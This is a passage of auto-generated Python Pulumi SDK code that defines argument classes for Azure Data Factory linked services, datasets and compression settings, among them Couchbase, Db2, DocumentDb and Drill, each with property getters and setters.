pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class CouchbaseLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Couchbase server linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'Couchbase')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class CouchbaseTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Couchbase server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'CouchbaseTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class CustomDataSourceLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Custom linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'CustomDataSource')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class CustomDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The custom dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'CustomDataset')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class DatasetBZip2CompressionArgs:
def __init__(__self__, *,
type: pulumi.Input[str]):
"""
The BZip2 compression method used on a dataset.
:param pulumi.Input[str] type: Type of dataset compression.
"""
pulumi.set(__self__, "type", 'BZip2')
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset compression.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class DatasetDeflateCompressionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
level: Optional[pulumi.Input[str]] = None):
"""
The Deflate compression method used on a dataset.
:param pulumi.Input[str] type: Type of dataset compression.
:param pulumi.Input[str] level: The Deflate compression level.
"""
pulumi.set(__self__, "type", 'Deflate')
if level is not None:
pulumi.set(__self__, "level", level)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset compression.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def level(self) -> Optional[pulumi.Input[str]]:
"""
The Deflate compression level.
"""
return pulumi.get(self, "level")
@level.setter
def level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "level", value)
@pulumi.input_type
class DatasetGZipCompressionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
level: Optional[pulumi.Input[str]] = None):
"""
The GZip compression method used on a dataset.
:param pulumi.Input[str] type: Type of dataset compression.
:param pulumi.Input[str] level: The GZip compression level.
"""
pulumi.set(__self__, "type", 'GZip')
if level is not None:
pulumi.set(__self__, "level", level)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset compression.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def level(self) -> Optional[pulumi.Input[str]]:
"""
The GZip compression level.
"""
return pulumi.get(self, "level")
@level.setter
def level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "level", value)
@pulumi.input_type
class DatasetZipDeflateCompressionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
level: Optional[pulumi.Input[str]] = None):
"""
The ZipDeflate compression method used on a dataset.
:param pulumi.Input[str] type: Type of dataset compression.
:param pulumi.Input[str] level: The ZipDeflate compression level.
"""
pulumi.set(__self__, "type", 'ZipDeflate')
if level is not None:
pulumi.set(__self__, "level", level)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset compression.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def level(self) -> Optional[pulumi.Input[str]]:
"""
The ZipDeflate compression level.
"""
return pulumi.get(self, "level")
@level.setter
def level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "level", value)
@pulumi.input_type
class Db2LinkedServiceArgs:
def __init__(__self__, *,
database: Any,
server: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
username: Optional[Any] = None):
"""
Linked service for DB2 data source.
:param Any database: Database name for connection. Type: string (or Expression with resultType string).
:param Any server: Server name for connection. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] authentication_type: AuthenticationType to be used for connection.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for authentication.
:param Any username: Username for authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "database", database)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "type", 'Db2')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def database(self) -> Any:
"""
Database name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Any):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def server(self) -> Any:
"""
Server name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
AuthenticationType to be used for connection.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
Username for authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class DocumentDbCollectionDatasetArgs:
def __init__(__self__, *,
collection_name: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Microsoft Azure Document Database Collection dataset.
:param Any collection_name: Document Database collection name. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "collection_name", collection_name)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'DocumentDbCollection')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="collectionName")
def collection_name(self) -> Any:
"""
Document Database collection name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "collection_name")
@collection_name.setter
def collection_name(self, value: Any):
pulumi.set(self, "collection_name", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class DrillLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Drill server linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'Drill')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DrillTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Drill server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'DrillTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
